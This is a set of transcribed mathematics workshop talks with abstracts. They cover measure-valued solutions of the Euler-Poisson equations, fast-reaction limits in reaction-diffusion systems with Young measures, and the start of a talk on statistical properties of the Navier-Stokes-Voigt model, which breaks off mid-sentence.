And she is going to give us a talk about dissipative measure-valued solutions for the Euler-Poisson equations. Please. Thank you very much for the introduction. So the work I am going to present today is joint work with various people, and my idea was to put up the photos of my co-authors; but then I realized that all of them, as far as this work is concerned, are among the participants of our meeting. So instead of inserting the photos, I decided I could take our group photo and edit it a little bit to include José as well. So thank you for adding me. Most of my talk today will be devoted to the joint work with José, with Tomek Dębiec and with Piotr, but I will also make some small excursions to the joint works with Eduard Feireisl, with Emil Wiedemann and with Ondřej Kreml. And I will also make some connections to works of Thanos; the works of, and discussions with, Thanos influenced some of the results in this topic. I would also like to very much appreciate Mira's idea of putting my lecture as the last one, because so much has already been said about measure-valued solutions, Young measures, the relative energy inequality, and weak-strong or measure-valued-strong uniqueness that I am ready with the background, so I do not need an introduction. I am sorry to those who had to miss some of the earlier talks, but I will skip this part. What I want to tell you is that this will not be the typical kind of weak-strong uniqueness result; it is slightly different — I don't know whether it is surprising or not, but different. And finally, about the Euler system with non-local terms: a lot has been said, mostly with alignment terms, in the context of collective dynamics. I will concentrate more on the Euler-Poisson system, but that is in fact just an example; an analogous result also holds if we add some alignment terms. For the presentation, Euler-Poisson will just be easier. So, the essential things about Young measures I will put on one slide. Well, the question is whether Young measures can describe concentration effects; of course, in the case of systems where we do not have sufficient a priori estimates, we cannot exclude them, and that is why these concentration measures appear again and again. And just to say clearly what we mean by that: first, if we have some family of functions, then the classical fundamental theorem on Young measures provides the existence of a weakly measurable mapping, and with that we can describe the limit of the composition of some nonlinear function with the sequence. And this is done via a duality pairing, the duality between the space of measures and C0 functions. Okay, so good. That's one thing; but on the other hand, when we have a function and we only know boundedness in L1, then we can claim, with basic arguments like Banach-Alaoglu, that there exists a weak-star limit in the space of measures. This is the concentration measure, and in what follows I will always use the notation m, with an index to indicate from which term, which function, it is coming. It is the difference between the limit in the space of measures and, in fact, the biting limit — the oscillatory part. Okay, and a remark: if we already know that the sequence is weakly precompact in L1, then we do not have this concentration measure. That is what I wanted to make sure you remember from the other talks. And an important thing is that we will also need to somehow compare such concentration measures.
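In symbols, the notation just described reads roughly as follows; this is my transcription of the standard setup, so the exact function spaces are assumptions. For a bounded sequence $u_n$ one has, along a subsequence,
\[
g(u_n) \rightharpoonup \langle \nu_{x}, g\rangle = \int g(\lambda)\, d\nu_{x}(\lambda) \qquad \text{for } g \in C_0,
\]
while for a nonlinearity that is merely bounded in $L^1$,
\[
g(u_n)\,dx \ \overset{*}{\rightharpoonup}\ \langle \nu_{x}, g\rangle\,dx + m_g
\]
weakly-* in the space of measures, where the defect $m_g$ is the concentration measure associated with $g$; the bars used below stand for the sum $\overline{g(u)} = \langle \nu, g\rangle + m_g$ of the oscillatory and concentration parts.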
What is behind this is, of course, that for the measure-valued-strong uniqueness result we will need a relative energy inequality. Trying to show that such an inequality holds, we need to estimate the appropriate terms, and once a concentration measure is present, we will also need to compare them somehow. So the important thing is that once we know a relation between functions, the same is true for the corresponding concentration measures. I will not really use it here, because I am not going to show you a proof, but keep in mind that this is an important fact. So, maybe very shortly: measure-valued solutions were somehow appreciated more after the first result for the incompressible Euler system about weak-strong, or measure-valued-strong, uniqueness by Brenier, De Lellis and Székelyhidi. There the measure-valued solutions were in the setting of DiPerna-Majda measures; I do not want to go into details, but anyway, with the help of the relative energy inequality one could get that the measure-valued solution is a Dirac delta function concentrated at the strong solution U. Okay, and after that many results of this type appeared for different systems. Maybe I would like to mention — not going into details, I will be very imprecise here — the case of systems of conservation laws. So let us think about such a general system. Some of the results appear in the paper I mentioned before, but with an additional assumption and without concentration measures, and also in one of the papers of Thanos, where the concentration measure appeared in the entropy inequality. What I shortly want to mention is that there is a result here, with Piotr and Ondřej, for such a general hyperbolic system. And maybe let me first refer to the system that Thanos considered, also in this form. Again, I underline that I am not writing most of the assumptions; I just want to underline the relations between the flux functions — the flux under the time derivative, the flux under the divergence — and the entropy function: the functions from the equations have to be controlled in this way by the entropy function. Thanos did this for such a general system, and it is very well suited for an example like polyconvex elastodynamics. However, this condition is not satisfied when we look into fluid dynamics, for example for the compressible Euler equations; so we worked in a similar spirit, but requiring only boundedness. Still, this is not a universal result: it does not work, for example, for the Euler-Poisson system, and the problem is precisely with this assumption — in the momentum term here we do not have the pressure term, so we will not be able to control some of the terms by the entropy. So let me now concentrate, until the end of the talk, on this Euler-Poisson system. Here we have such a kernel; I consider the Newtonian kernel. So the first thing, which is very useful, is that this term can be written in such a form — I would probably not have discovered these computations myself, but I know them from Thanos. So in fact what we consider further is the system not in the first form, but with this term written in divergence form.
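To fix notation, a minimal sketch of the pressureless Euler-Poisson system being discussed, and of the divergence-form rewriting of the forcing term, is the following; the sign conventions for the potential and the force are my assumptions.
\[
\partial_t \rho + \operatorname{div}_x(\rho u) = 0, \qquad \partial_t(\rho u) + \operatorname{div}_x(\rho u\otimes u) = -\,\rho\,\nabla_x \Phi, \qquad \Delta \Phi = \rho ,
\]
and, whenever $\Delta\Phi = \rho$,
\[
\rho\,\nabla\Phi = \operatorname{div}\Big(\nabla\Phi\otimes\nabla\Phi - \tfrac12\,|\nabla\Phi|^2\,\mathrm{Id}\Big),
\]
which is the divergence form of the nonlocal term referred to above.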
Okay, and the definition of measure-valued solutions — maybe don't try to read it in detail, in particular because it is not fully correct, as I discovered today shortly before the talk, but I did not want to mess things up by changing it: I wrote the definition for the system in the first form, and it should be for the second one. But anyway, what is crucial: everywhere these bars appear, it will always be the sum of the oscillatory part coming from the Young measure and the concentration part. So when speaking about a solution, we think about such a vector-valued Young measure together with concentration measures related to the nonlinear terms that may appear. It is not important at all to remember this definition; I will tell you in a moment what is important. However, from a measure-valued solution we also want that it satisfies some energy inequality. So we formulate an analogue of the energy inequality, but in the measure-valued setting, and again the bars always have the same meaning. So a measure-valued solution is admissible if it satisfies the following energy inequality. A couple of remarks on what is important to underline. The concentration measure may certainly appear also in the density, which we are not so used to when we think about systems with a pressure; and this is because the pressure is not here, and we have no way to provide better integrability of the density. And also, if we look at the energy inequality, concentrations may also be produced by the term here. Okay, so the way we proceed is, let's say, the usual way when aiming for such a result. We define the relative energy; it has the following form — again, the bars are the sums of the oscillation and concentration parts. We show that such an inequality is satisfied, and then we work on this remainder term: we want to estimate the remainder by the integral of the relative energy and then conclude with a Gronwall inequality argument. Okay, good. So once you have used Gronwall and you have the information that this relative energy is equal to zero, then, okay, the last step seems obvious — you would not even write it down — that the Dirac measure is concentrated at the strong solution and the concentration measures vanish. One could say it is so obvious that the details may be omitted. And in fact, in spring we were visiting José in London for a couple of days, doing lots of estimates and computations on the blackboard, and once we got this relative energy to be zero, we thought we were done, said goodbye to José and went to the airport. But here starts what is interesting in my talk: we do not have these conclusions, because at the airport we had the idea, let's write it down in detail — and it turned out that, well, no, we cannot show this. So we got a measure-valued-strong uniqueness result, but it is different, not like the usual one. So, looking at the parts of the energy inequality: this part has to be zero, and from here we can conclude that the Young measure here is a tensor product with the Dirac measure concentrated at the gradient of phi of the strong solution, and the corresponding concentration measure vanishes. And then, with that knowledge, we go to the kinetic part, the second part of the relative energy, which is here, and conclude that this is now non-negative, because this concentration measure is zero.
But if we are away from vacuum, so that we can estimate the density from below, then we can say that this Young measure here is a tensor product of the Dirac measure concentrated at U and some Young measure coming from the density. And on the vacuum set we can say, okay, the density is zero, so here we get this Dirac delta function, but here there is still some Young measure, because we are losing some information. So we do not arrive at the statement that the measure is the product of the appropriate Dirac measures. It is not like in the case of weak solutions, where from the equation we could pull out this information — from information on phi, information on rho. You work it out later, from the Poisson equation, that what corresponds to the strong solution is rho, but with a bar; the bar is the oscillatory part plus the concentration measure. And then you look at the different terms and, using the equation, you are able to show various relations, but again with bars. And that is why this result is different: you get the result, however without showing that all Young measures are Dirac measures and that all concentration measures vanish. Okay, so thank you very much for your attention.
We consider pressureless compressible Euler equations driven by nonlocal repulsion-attraction and alignment forces. Our attention is directed to measure-valued solutions, i.e., very weak solutions described by a classical Young measure together with appropriate concentration defects. We investigate the evolution of a relative energy functional to compare a measure-valued solution to a regular solution emanating from the same initial datum. This leads to a weak-strong uniqueness principle.
10.14288/1.0398184 (DOI)
Okay, so thank you very much for the introduction. And of course I would like to thank the organizers, Agnieszka and Mira, for inviting me here. So the title seems to be a little bit biological, but actually it has some connections with conservation laws, with measure-valued solutions, with Young measures, so it is not entirely biological, and it fits a little into the topic of the workshop. So as a warm-up, let's consider a system of reaction-diffusion equations. We have two components, u and v; you have diffusion of u and diffusion of v, and you also have this reaction term. And the reaction term is scaled with epsilon, so when epsilon is very small, the reaction is very fast. And the question is: what happens with solutions to this system when epsilon goes to zero? So let me first consider the classical case, which was done around 20 years ago. When f is strictly increasing, so f prime is strictly greater than zero, you can denote by g the primitive function of f. Then you multiply the first equation by f of u epsilon, the second by v epsilon — the usual thing in PDEs — and you obtain two energy equations: the change of energy of u and the change of energy of v. Now, at this level this is useless, because here you have the term one over epsilon, which is in general singular. But what you can do with these two identities is sum them up, which is what I do here, and at this level these two terms, when added together, result in this term. And this term has the advantage that its sign is controlled. This energy equality is now useful for understanding what happens in the limit, because you have a lot of a priori estimates. First, because the time derivative of this energy is negative, you have a priori estimates in L infinity. Then, if you have a priori estimates in L infinity, you use the fact that the three terms on the right-hand side have a negative sign: f of u epsilon minus v epsilon converges to zero strongly, and you also have estimates for the gradients of both u and v, so in particular the sum is bounded. You also have estimates for the time derivative, because if you sum up these equations, you obtain that the time derivative of the sum is a sum of Laplacians, which is bounded in some negative Sobolev space by the estimates on the gradients. So you can use the Aubin-Lions lemma to get that the sum also converges strongly. And if you know that the sum converges strongly, you can write the sum of u epsilon and f of u epsilon as a combination of two things that you know converge strongly, and from this you also get that u epsilon converges strongly, v epsilon converges strongly, and you have some relation between v and u in the limit. So these are rather classical things, done by Bothe and Hilhorst in 2003. And now the problem that Benoît and I were working on is the question: what happens when f prime can change sign? That is, when this reaction function can have some regions where it is decreasing. And now you see the main problem: all these a priori estimates are now useless. This doesn't work, because if f prime changes sign, then you don't have estimates on the gradient of u, you don't have estimates on the gradient of v, and you don't even have this strong convergence of f of u epsilon. So now this energy approach doesn't work, and we do not know any of this.
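Since the computation is only described in words, here is the energy identity in question, written out for the system $\partial_t u^\varepsilon = d_1\Delta u^\varepsilon + \tfrac{1}{\varepsilon}(v^\varepsilon - f(u^\varepsilon))$, $\partial_t v^\varepsilon = d_2\Delta v^\varepsilon + \tfrac{1}{\varepsilon}(f(u^\varepsilon) - v^\varepsilon)$; the diffusion constants $d_1, d_2$ are my notation. With $G' = f$, multiplying the first equation by $f(u^\varepsilon)$, the second by $v^\varepsilon$, summing and integrating by parts gives
\[
\frac{d}{dt}\int \Big( G(u^\varepsilon) + \tfrac12 |v^\varepsilon|^2 \Big)\,dx
= -\,d_1\!\int f'(u^\varepsilon)\,|\nabla u^\varepsilon|^2\,dx \;-\; d_2\!\int |\nabla v^\varepsilon|^2\,dx \;-\; \frac1\varepsilon\!\int \big(f(u^\varepsilon)-v^\varepsilon\big)^2\,dx ,
\]
so when $f' > 0$ all three terms on the right-hand side are non-positive, which is exactly the list of a priori estimates above; when $f'$ changes sign it is the first term that breaks down.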
So I will come back to this general problem later on, but then we started to study a simpler problem: we removed the first diffusion. So we started to consider a system where one component is allowed to diffuse — this is v — and the other component cannot diffuse, it is immobile. And this is already a difficult problem, as you will see in a minute, but it has one advantage: you can still use the energy equality to study it, because if d1 is zero, this troublemaker term simply vanishes. So now you have estimates on the gradient of v, and you also have the strong convergence of f of u epsilon minus v epsilon to zero. So this is a little bit better. And now I will become more precise, and I will first tell you that, due to some technicalities that will appear, I consider a special function f: I assume that it has a region where the function is increasing, a region where it is decreasing, and another region where it is increasing. This is just to focus attention. And now I will show you a numerical simulation before I state the main result. The numerical simulations are as follows: the blue line represents the concentration of u, the non-diffusing component, and the red line represents the concentration of the diffusing component. As you see, this blue line looks like an oscillating sequence with a Young measure that is some combination of Dirac masses — this is more or less what you would guess if you looked at this picture. But on the other hand, you see that v behaves rather nicely. And now I will state the result. So again, we have this system; remember that I removed the one diffusion. We have the a priori estimate from the energy equality on the gradient of v, and we also have the energy estimate for this term. And what we prove is that v epsilon converges strongly to v — strongly meaning both in time and space. And what is very interesting about this result, what I like a lot, is that it is obtained without any estimates on the derivative in time: you have compactness in space, but you actually have no compactness in time. It is very similar to, for instance, vanishing viscosity in conservation laws. And in fact, you can multiply the second equation by the time derivative of v to realize that this time derivative of v behaves more or less like one over square root of epsilon, so it is singular in general. Some other consequences of this strong convergence of the diffusing component: we also have that f of u epsilon converges to v, but this is just a consequence of the a priori estimate, because if f of u epsilon minus v epsilon over square root of epsilon is bounded, then the quantity above converges to zero — this is nothing important now. But another thing that I get from this strong convergence of the diffusing component is the Young measure of the non-diffusing component. So let me recall briefly what a Young measure actually is. If I have a bounded sequence of functions u epsilon, then how do I pass to the weak limit under a nonlinearity? You write this g of u epsilon as an artificial integral of the function g against the Dirac measure concentrated at u epsilon, and this measure is bounded in total variation by one, so you can pass to the weak-star limit, of course taking some subsequence. And the limit measure is what we call the Young measure.
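As an aside on the numerical simulations mentioned above, here is a minimal illustrative sketch in Python of the kind of computation that could produce such pictures; the reaction function, the parameters, the initial data and the discretization are all invented for illustration and are not taken from the authors' work.

import numpy as np

# Fast-reaction system with an immobile component u and a diffusing component v:
#   du/dt = (v - F(u)) / eps,   dv/dt = v_xx + (F(u) - v) / eps
# F is a hypothetical nonmonotone reaction function with the
# increasing / decreasing / increasing profile described in the talk.
def F(u):
    return u**3 - 3.0*u          # F' = 3u^2 - 3 < 0 on (-1, 1): middle branch unstable

L, N = 1.0, 128                  # domain length and number of grid points
dx = L / N
x = np.linspace(0.0, L, N, endpoint=False)
eps = 1e-2                       # reaction time scale
dt = 2e-5                        # explicit step, small enough for diffusion and reaction
steps = int(0.05 / dt)

# Invented initial data crossing the unstable region of F; v starts flat.
u = 1.5 * np.sin(2.0 * np.pi * x)
v = np.zeros_like(x)

def laplacian(w):
    # periodic finite-difference Laplacian
    return (np.roll(w, -1) - 2.0*w + np.roll(w, 1)) / dx**2

for _ in range(steps):
    reaction = (v - F(u)) / eps
    u = u + dt * reaction
    v = v + dt * (laplacian(v) - reaction)

# Expected outcome: v stays smooth, while u is driven onto different branches of
# F^{-1}(v) and develops sharp spatial variation, in the spirit of the blue/red
# curves described in the talk.
print("v range:", v.min(), v.max())
print("u range:", u.min(), u.max())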
And now you can use the following facts. The first observation is that, since f of u epsilon converges to v epsilon and v epsilon converges strongly to v, the Young measure of f of u epsilon has to be the point mass at v. But on the other hand, if you denote by mu the Young measure of u epsilon, then the Young measure of f of u epsilon has to be the image of this measure under the map f. So it follows that mu has to be concentrated on the preimage of v under the map f. And now, how does this result in these oscillations? If you recall the shape of the function f that I assumed, well, it looks like that: it has an increasing region — this is the red part — a decreasing region — the blue part — and again an increasing region — the yellow part. And now, if v is somewhere here between f minus and f plus, it hits three points: there are three points u such that f of u is equal to v. And these are precisely the points u is oscillating between. So what follows from the strong convergence of the diffusing component is that the Young measure of u epsilon is some combination of three Dirac masses — at most three Dirac masses. In the numerical simulations we see two of them. Okay, so you see that all these results about this system, with one diffusing component and one component which is not diffusing, rest on proving the strong convergence of v epsilon without information on the time derivative of v. That's the main thing. So the way to do that is more or less based on the compensated compactness approach: we first obtain some family of energies, then we play with weak limits and obtain some identities that are satisfied for many test functions, and then we conclude. So how do we go? Recall the system: we have again two equations, one without diffusion and one with diffusion. And okay, I fix some smooth function phi, and I test the first equation with phi of f of u epsilon and the other equation with phi of v epsilon. The result is as follows: here nothing changes, I just multiplied; here also nothing changes, I just multiplied; when it comes to this term from the diffusion, you just play with derivatives to write it like that; and here you have to use primitive functions in order to write it again as the time derivative of some function. Okay, I think it's clear. And again, as with the a priori estimates, these terms are still troublemakers, because they are singular; but if you sum these things up, you obtain something like that. So we have the time derivative — this is the red term; you have the Laplacian — it is okay; and you have these two terms. As we know from the a priori estimates, grad v is bounded, and this is also bounded, because if you use a Taylor estimate you obtain v epsilon minus f of u epsilon squared over epsilon, so this is bounded, say, in L1. Okay, so what I get from this are a priori estimates for these energies, namely that the time derivative is bounded in some negative Sobolev space. I need this H minus 1 because of the Laplacian here: if I multiply by a function in H1, I can move one derivative onto the test function, and this is exactly why I need H minus 1. And I also know that this is just from a priori estimates, because if v epsilon is in H1, then any smooth function of v epsilon is also in H1. Okay. So if I know this, I can conclude with the following compensated compactness lemma. So how does it go? I have this function here — so this is precisely the function here — and phi of v epsilon is here.
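In symbols, the conclusion about the Young measure drawn above reads as follows; the weights $\alpha_i$ are of course unknown functions of $(t,x)$.
\[
f_{\#}\nu_{t,x} = \delta_{v(t,x)} \quad\Longrightarrow\quad \operatorname{supp}\nu_{t,x} \subset f^{-1}\big(\{v(t,x)\}\big),
\]
so that, for $v(t,x)$ strictly between $f_-$ and $f_+$,
\[
\nu_{t,x} = \alpha_1\,\delta_{s_1(v(t,x))} + \alpha_2\,\delta_{s_2(v(t,x))} + \alpha_3\,\delta_{s_3(v(t,x))}, \qquad \alpha_i \ge 0,\quad \alpha_1+\alpha_2+\alpha_3 = 1,
\]
where $s_1, s_2, s_3$ are the three branches of $f^{-1}$ on $(f_-, f_+)$.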
So it is a rather well-known result that if you have one sequence of functions which is compact in space and another one which is compact in time, then the weak limit of the product is the product of the weak limits. And this is more or less something very similar to the div-curl lemma. Okay. And from this it is rather easy to obtain some identity on u epsilon. So here I have just rewritten what was on the previous slide, and how do we go on? Well, we have to clean this up a little bit. Since you know that v epsilon converges to the same limit as f of u epsilon, you can replace this v epsilon here — because if the test functions are smooth, then they are in particular Lipschitz — so I can write it like that. So now I have u epsilon everywhere. And at this level, this is very similar to, for instance, the analysis of the vanishing viscosity limit for measure-valued solutions to conservation laws, to get that the Young measure is a Dirac mass. But here there is a small difference, and I will point it out. Usually you have just some function phi of lambda, and here these functions are composed with f of lambda: so it is not just phi of u epsilon but, for instance, here you have f of u epsilon, and this f is also hidden, because c prime is defined as phi of f. So you also have to deal with this f. And here comes another technical assumption on f — we somehow couldn't do it without this. The assumption is quite technical, so I will just state it in the simplest possible way. If you recall the plot of f, it looks like that: it has one increasing region, one decreasing region, and another one which is increasing. So you can define three inverse branches of f: s1, s2, s3. And the assumption reads that the derivatives of these three branches have to be linearly independent. So it is more or less saying that f has to be sufficiently curved. In particular, this does not hold if f is a piecewise affine function, because in that case the derivatives of all three inverse branches are just constants. Okay. So I will spend the rest of my time to briefly pay some tribute to the Russian mathematician Plotnikov, because it is more or less his ideas that we applied to this problem. So Plotnikov studied the following equation in the 90s: he considered a forward-backward parabolic equation. Here you have the time derivative, here you have the Laplacian, and this f has the same monotonicity profile — two increasing regions and one between them which is decreasing. So you see that there is this unstable region where the equation is actually backward parabolic, and this makes trouble. And Plotnikov — among many, many authors — studied the following regularization: he adds this time derivative here with epsilon. You see that this is a good regularization, because if you move this term to the left-hand side, you will have something like identity minus epsilon Laplacian, which is invertible as long as epsilon is greater than zero; and then you can throw it back on the right-hand side, and you will have just a simple ODE in some Banach space. So as long as epsilon is non-zero, you can solve this equation — it is some kind of regularization. And he gets a similar result: that the Young measure of the solution converges and is a convex combination of Dirac masses, each located in one of these monotone regions of f. So it is a very similar result. And our problem looks very similar to this Plotnikov regularization, because if you sum up our equations, here we have something like v; okay, here is something different.
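The comparison being made here can be written out explicitly; this is my reconstruction from the description in the talk. Plotnikov's regularization of the forward-backward equation $\partial_t w = \Delta f(w)$ is
\[
\partial_t w = \Delta f(w) + \varepsilon\,\Delta \partial_t w, \qquad\text{i.e.}\qquad (I - \varepsilon\Delta)\,\partial_t w = \Delta f(w),
\]
while in the system with $d_1 = 0$ the first equation gives $v^\varepsilon = f(u^\varepsilon) + \varepsilon\,\partial_t u^\varepsilon$, so adding the two equations yields
\[
\partial_t\big(u^\varepsilon + v^\varepsilon\big) = \Delta v^\varepsilon = \Delta f(u^\varepsilon) + \varepsilon\,\Delta \partial_t u^\varepsilon .
\]
The right-hand sides coincide; the difference is that the time derivative on the left acts on $u^\varepsilon + v^\varepsilon$ rather than on $u^\varepsilon$ alone, which is the "something different" referred to above.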
But I will just tell you that it is not so different, so that we could actually apply similar techniques. And okay, I did not find this paper in English — it is in Russian — and quite a big part of this work was translating his paper from Russian to English. If you are interested, I have an English version typed in TeX, because it is quite an insightful paper. Okay, and brief comments on the general problem that we would still like to understand: two diffusing components, u and v. There are some estimates from the Japanese mathematical school which allow us to control, again, this quantity and this quantity — so it is not exactly the same. Now for v epsilon there is no chance for all the convergences that I described before, because we have simulations showing that. But there is again something similar: if you sum up these equations, what we see in the simulations is that there is a chance for strong convergence of this quantity. And this is precisely what we had before, because if d1 is zero, this is exactly that quantity. So — my time is up. So there is a chance that this will converge strongly. But what you also see in the simulations is that both u and v oscillate; it is not like before, where at least v epsilon does not oscillate. In this general problem, both of these quantities are oscillating. Okay, and with this I would like to thank you. All right.
We analyse fast reaction limit in the reaction-diffusion system \begin{align*} \partial_t u^{\varepsilon} &= \frac{v^{\varepsilon} - F(u^{\varepsilon})}{\varepsilon}, \\ \partial_t v^{\varepsilon} &= \Delta v^{\varepsilon} + \frac{F(u^{\varepsilon}) - v^{\varepsilon}}{\varepsilon}, \end{align*} with nonmonotone reaction function $F$. As speed of reaction tends to infinity, the concentration of non-diffusing component $u^{\varepsilon}$ exhibits fast oscillations. We identify precisely its Young measure which, as a by-product, proves strong convergence of the diffusing component $v^{\varepsilon}$, a result that is not obvious from a priori estimates. Our work is based on analysis of regularization for forward-backward parabolic equations by Plotnikov [2]. We rewrite his ideas in terms of kinetic functions which clarifies the method, brings new insights, relaxes assumptions on model functions and provides a weak formulation for the evolution of the Young measure.
10.14288/1.0398463 (DOI)
I haven't been doing much work on non-Newtonian fluids for a while, so I had to dig up some of the old stuff, which I have probably never spoken about before: statistical properties of the Navier-Stokes-Voigt model. So let's go ahead. This is the incompressible Navier-Stokes equation — you have probably seen a lot of it — subject either to periodic boundary conditions or to Dirichlet boundary conditions. And now I would like to talk about the concept of averages. One possible meaning of this notion, which we see in the physics literature, is the expectation value of a nice function with respect to some kind of measure, on some measure space associated with solutions of the Navier-Stokes equations. We consider either invariant measures supported on the global attractor, or measures supported on a Navier-Stokes solution path — a particular trajectory, for which you take a long-time average — possibly under some random perturbation, or one can also consider stationary statistical solutions, a notion which was introduced by Foias. So I will talk about all these issues concerning what we mean by the averages that we see all the time in turbulence theory. So, the spaces of functions: in the case of Dirichlet boundary conditions, these are the test functions, the divergence-free C-infinity functions. Their closure in L2 I will call H, and the closure in H1 I will call V. The projection from L2 onto the divergence-free functions, into H, is called the Leray-Helmholtz projection; it will be denoted by P_L. Then there is the Stokes operator, which is defined to be minus the Leray-Helmholtz projection composed with the Laplacian, and the nonlinearity — sorry, somebody maybe needs to mute himself, it makes too much noise — the Leray projection kills the pressure, the nonlinearity takes this bilinear form, and therefore one can think of the Navier-Stokes equations as an evolution equation in the space H: du/dt equals f, the forcing, minus the Stokes operator term, minus the nonlinearity. This is the equation of motion. So now I am going to talk about the Reynolds equations. What Reynolds did was take a long-time average of the equation: when you take the long-time average formally, and assume that the solutions are bounded, the time derivative disappears, and therefore Reynolds ends up with the following equation for the averaged quantity — say the infinite-time average, assuming it exists — involving the Stokes operator acting on the average and the bilinear term evaluated at the average, equal to the average of the forcing if it is time dependent. Now, this is a nice equation; it looks like the steady-state Navier-Stokes equations. However, because of the nonlinearity — and we know that the average of a product is not the product of the averages — there is some leftover, and that is what we teach our students: there is this term, which is basically the average of the interaction of the fluctuation with the fluctuation, the divergence of that, and this term is called the Reynolds stress tensor; u prime, the fluctuation, is u minus the average. In other words, the equation for the average is not closed: I do not have a closed equation for u bar. So in order to find the equation of motion for u bar, I need to know something about the average of the fluctuation-fluctuation interaction, which is a second-order moment, in order to understand the average, which is a first-order moment.
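In symbols, the Reynolds decomposition and the averaged equation just described take roughly the following form in the functional notation of the talk, with $A$ the Stokes operator and $B$ the projected nonlinearity; this is a standard formal computation rather than anything specific to the speaker's slides.
\[
u = \bar u + u', \qquad \nu A\bar u + B(\bar u,\bar u) + \overline{B(u',u')} = \bar f,
\]
where, in physical variables, the extra term corresponds to the divergence of the Reynolds stress tensor,
\[
\overline{B(u',u')} \;\longleftrightarrow\; \operatorname{div}\,\overline{u'\otimes u'} ,
\]
and it is this term that turbulence models try to express in terms of $\bar u$.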
And if you try to see the second order moment evolution, you will end up needing third order and therefore there's a hierarchy and this is never stops and this is called the closure problem in turbulence that we cannot have a closed system of equation. Nonetheless, this is the equation that people are interested in and all turbulence model is basically about how to model this term, the Reynolds average stresses in terms of u bar and this is based on empirical data or some kind of indicated guess and so on and so forth. So all what people in turbulence modeling doing is really trying to replace there this in terms of the average of you to get a closed model to get what's happening to this turbulence in the average. So turbulence theory is about statistics and all the models about what's going to happen to average quantities. It's not about individual solutions. So now what's the Navier-Stokes Void model? Using the Kelvin Void doing some expansions because of all kinds of like this elastic effect and doing some expansions with delays and formally one gets the following equation which is like the Navier-Stokes equation but you have this extra term which is alpha square Laplacian by the time derivative of this term. This is coming from the stress tensors if you do some kind of like this is some Kelvin Void kind of like approximation model. Some people in viscoelasticity claim this has nothing to do with viscoelasticity to the point that they basically do not even to consider it as part of viscoelasticity community. I am not going to put the hat of viscoelasticity except that this is supposed to be a non-tunnel fluid workshop. That's why I'm talking about it in that context but I would like to consider it in a different way. What do I mean? So this is the equation of motion and I put here alpha to stress that this is this alpha term here in addition to the Navier-Stokes. So this is Navier-Stokes equation plus this particular term. Now let me stress something very important. First of all I mean I will mention something. This equation or this model has a global regularity even in three dimensions. So this is not adding hyperviscose for the Navier-Stokes. This is just adding this time derivative of the Laplacian. In some sense this is changing the energy in the Navier-Stokes equation when you multiply by u and integrate. Instead of being the L2 norm we will become the L2 norm plus the alpha squared gradient norm. In other words what is conserved or whatever is dissipated by the viscosity is the H1 norm and we know the H1 norm is the quantity that we need to control in Navier-Stokes to get global existence. So therefore this term does not really add a dissipation or regularize the solutions. It basically changes the structure of the equation that now you have a different conservation law or conserved quantities and therefore when alpha formally equals to zero I get Navier-Stokes and I would like to think about this as a numerical regularization of Navier-Stokes when alpha is very small different than the hyperviscose regularization that people like to put because hyperviscose regularization kills the energy very quickly especially at the larger scales and there is an additional problem in numerical analysis point of view. In Navier-Stokes usually I give you the boundary condition say u equals to zero at the boundary. 
If you add hyperviscosity, say the Laplacian squared, then I need an additional boundary condition, which means I will need to artificially introduce a new boundary condition there, which means I will affect the boundary layers; and we know that in turbulence most turbulent flows are driven by the boundary, so doing something with the boundary condition is a little bit ad hoc and needs interpretation or explanation. Now this term here, which is the Laplacian of the time derivative, would seem to require a boundary condition on the time derivative, but I do not need to create one, because if u is given to be zero at the boundary then u sub t at the boundary is also zero, so I do not need to do anything ad hoc to satisfy the boundary condition for this numerical regularization. So this is the model that I would like to think about as an approximation of the Navier-Stokes equations. We invented this model coming from the alpha models of turbulence, but later, when we dug into the literature, we realized that it was part of the thesis of Oskolkov, a student of Ladyzhenskaya, in 1973. We managed to prove all these things about the finite dimensional attractor, and we can prove global well-posedness even without viscosity. So what is interesting about this model is that even without viscosity, like for the Euler equations, when you regularize Euler this way you have global existence; but we have to be careful, because for Euler the boundary condition is not on the full velocity, it is only on the normal component, so with periodic boundary conditions this is a good regularization for Euler. So even in the Euler case we can show global existence for this model; I don't have much time to talk about that.
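For reference, the Voigt-regularized system and the modified energy balance described above can be written as follows; this is the standard way the model appears in the literature and is meant as a sketch, not a verbatim copy of the slides.
\begin{align*}
&-\alpha^2\,\partial_t\Delta u + \partial_t u - \nu\Delta u + (u\cdot\nabla)u + \nabla p = f, \qquad \nabla\cdot u = 0,\\
&\frac{1}{2}\,\frac{d}{dt}\Big(\|u\|_{L^2}^2 + \alpha^2\|\nabla u\|_{L^2}^2\Big) + \nu\,\|\nabla u\|_{L^2}^2 = (f,u),
\end{align*}
so the quantity controlled for all time is the $H^1$ norm, which is exactly what one would need to control for global regularity of Navier-Stokes, and formally setting $\alpha = 0$ returns the Navier-Stokes equations.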
What's interesting here is that if I look at this operator identity minus alpha square Laplacian and I invert it multiply I get Laplacian with inverse of Laplacian so the viscosity is now no longer viscosity it's a damping term in other words this equation is no longer parabolic even if you forget about the linearity this equation is no longer parabolic it is like an evolution equation like an ODE and hence I don't expect smoothness property of the solution as in Navier-Stokes as in parabolic equation so nonetheless we have in some sense sort of like damping term due to the viscosity interacting with this regularization and because you don't have the smoothing if I start with initial data in H1 I remain indefinitely in H1 there is no smoothing effect but because of the damping we can show that if the force is analytic or in Givray class then the solutions on the attractor are in Givray class in other words the roughness in the initial data will eventually be damped by the damping term and disappears completely when time goes to infinity and hence the attractors or the element of the attractors are very nice why this is important because in turbulence theory when you write the energy spectrum of the solution there is a scale it's called the Kormogorov scale below that scale we know that the energy is exponentially small which means that the Fourier modes must be exponentially decaying after settling scale which is intimately related to the issue of analyticity of the solution namely as I mentioned here some Givray regularity so try to connect all these with the theory of turbulence so what's also observed about this equation which is puzzling if I take the Reynolds average, namely take the infinite tan average the tan derivative disappears and I remain with averages of the Navier-Stokes like term because I have here only tan derivative hence the Reynolds equation for this model is exactly the Reynolds equation of the Navier-Stokes this is what's basically forced us to look into the statistical properties of what's happening with this equation namely that the long-term average of the solutions offer the Navier-Stokes and the infinite tan average of the Navier-Stokes Voigt model obey the same equation so the dynamics maybe is different but when you go into the long-term statistics you give the same equation of course nobody said that the solution of this equation is unique but what people observe in averages they observe some unique structure and now the question is can we say aha even though the dynamics is different and the Navier-Stokes Voigt has a global existence but the long-term behavior or long-term averages or Reynolds equations are the same can we say something about the statistics of the Navier-Stokes Voigt is an approximation for the statistics of Navier-Stokes that's basically where we raise this question and trying to understand what is going in this way now as I said the Navier-Stokes equation if you write it in Fourier modes and for Fourier mode the wave number number k this is the equation of motion and there this is the nonlinearity we wrote it like explicitly here this is the viscosity this is the pressure and this is the forcing and this is into 